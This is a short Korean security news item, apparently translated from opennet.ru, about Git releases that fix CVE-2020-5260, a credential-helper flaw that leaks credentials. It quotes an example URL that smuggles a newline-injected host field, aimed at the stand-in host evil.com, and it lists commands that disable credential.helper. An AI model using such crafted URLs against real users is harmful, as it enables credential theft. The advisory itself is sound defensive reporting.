๊ฒ์๋จ ๋ถ์ฐ ์์ค ์ ์ด ์์คํ
Git 2.26.1, 2.25.3, 2.24.2, 2.23.2, 2.22.3, 2.21.2, 2.20.3, 2.19.4, 2.18.3 ๋ฐ 2.17.4์ ์์ ๋ฆด๋ฆฌ์ค ์ ๊ฑฐํ ์ทจ์ฝ์ (CVE-2020-5260) ์ฒ๋ฆฌ๊ธฐ์์ "์๊ฒฉ ์ฆ๋ช
.๋์ฐ๋ฏธ"๋ก ์ธํด git ํด๋ผ์ด์ธํธ๊ฐ ๊ฐํ ๋ฌธ์๊ฐ ํฌํจ๋ ํน๋ณํ ํ์ํ๋ URL์ ์ฌ์ฉํ์ฌ ์ ์ฅ์์ ์ก์ธ์คํ ๋ ์๊ฒฉ ์ฆ๋ช
์ด ์๋ชป๋ ํธ์คํธ๋ก ์ ์ก๋ฉ๋๋ค. ์ด ์ทจ์ฝ์ ์ ๋ค๋ฅธ ํธ์คํธ์ ์๊ฒฉ ์ฆ๋ช
์ด ๊ณต๊ฒฉ์๊ฐ ์ ์ดํ๋ โโ์๋ฒ๋ก ์ ์ก๋๋๋ก ์ค๋นํ๋ ๋ฐ ์ฌ์ฉ๋ ์ ์์ต๋๋ค.
"https://evil.com?%0ahost=github.com/"๊ณผ ๊ฐ์ URL์ ์ง์ ํ๋ฉด ํธ์คํธ evil.com์ ์ฐ๊ฒฐํ ๋ ์๊ฒฉ ์ฆ๋ช
์ฒ๋ฆฌ๊ธฐ๊ฐ github.com์ ๋ํด ์ง์ ๋ ์ธ์ฆ ๋งค๊ฐ ๋ณ์๋ฅผ ์ ๋ฌํฉ๋๋ค. ํ์ ๋ชจ๋์ ๋ํ URL ์ฒ๋ฆฌ๋ฅผ ํฌํจํ์ฌ "git clone"๊ณผ ๊ฐ์ ์์
์ ์ํํ ๋ ๋ฌธ์ ๊ฐ ๋ฐ์ํฉ๋๋ค. ์๋ฅผ ๋ค์ด "git submodule update"๋ ์ ์ฅ์์ .gitmodules ํ์ผ์ ์ง์ ๋ URL์ ์๋์ผ๋ก ์ฒ๋ฆฌํฉ๋๋ค. ์ด ์ทจ์ฝ์ฑ์ ๊ฐ๋ฐ์๊ฐ URL์ ํ์ธํ์ง ์๊ณ ์ ์ฅ์๋ฅผ ๋ณต์ ํ๋ ์ํฉ(์: ํ์ ๋ชจ๋ ์์
์)์ด๋ ์๋ ์์
์ ์ํํ๋ ์์คํ
(์: ํจํค์ง ๋น๋ ์คํฌ๋ฆฝํธ)์์ ๊ฐ์ฅ ์ํํฉ๋๋ค.
์ ๋ฒ์ ์ ์ทจ์ฝ์ ์ ์ฐจ๋จํ๋ ค๋ฉด ๊ธ์ง ์๊ฒฉ ์ฆ๋ช
๊ตํ ํ๋กํ ์ฝ์ ํตํด ์ ์ก๋๋ ๋ชจ๋ ๊ฐ์ ๊ฐํ ๋ฌธ์๋ฅผ ์ ๋ฌํฉ๋๋ค. ๋ฐฐํฌํ์ ๊ฒฝ์ฐ ํ์ด์ง์์ ํจํค์ง ์
๋ฐ์ดํธ ๋ฆด๋ฆฌ์ค๋ฅผ ์ถ์ ํ ์ ์์ต๋๋ค. ๋ฐ๋น์, Ubuntu, RHEL, ์์ธ/์คํ์์ธ, ํ๋๋ผ, ์์น, FreeBSD์.
๋ฌธ์ ๋ฅผ ์ฐจ๋จํ๋ ํด๊ฒฐ ๋ฐฉ๋ฒ์ผ๋ก ์ถ์ฒ ๊ณต๊ฐ ์ ์ฅ์์ ์ก์ธ์คํ ๋ credential.helper๋ฅผ ์ฌ์ฉํ์ง ๋ง๊ณ ํ์ธ๋์ง ์์ ์ ์ฅ์๊ฐ ์๋ "--recurse-submodules" ๋ชจ๋์์ "git clone"์ ์ฌ์ฉํ์ง ๋ง์ญ์์ค. credential.helper ํธ๋ค๋ฌ๋ฅผ ์์ ํ ๋นํ์ฑํํ๋ ค๋ฉด ๋ณด์กด ๊ทธ๋ฆฌ๊ณ ๋ค์์์ ๋น๋ฐ๋ฒํธ๋ฅผ ๊ฒ์ํฉ๋๋ค. ์๋์ฒ, ๋ณดํธ๋จ ๊ธ๊ณ ๋๋ ๋น๋ฐ๋ฒํธ๊ฐ ํฌํจ๋ ํ์ผ์ธ ๊ฒฝ์ฐ ๋ค์ ๋ช
๋ น์ ์ฌ์ฉํ ์ ์์ต๋๋ค.
git config --unset credential.helper
git config --global --unset credential.helper
git config --system --unset credential.helper
์ถ์ฒ : opennet.ru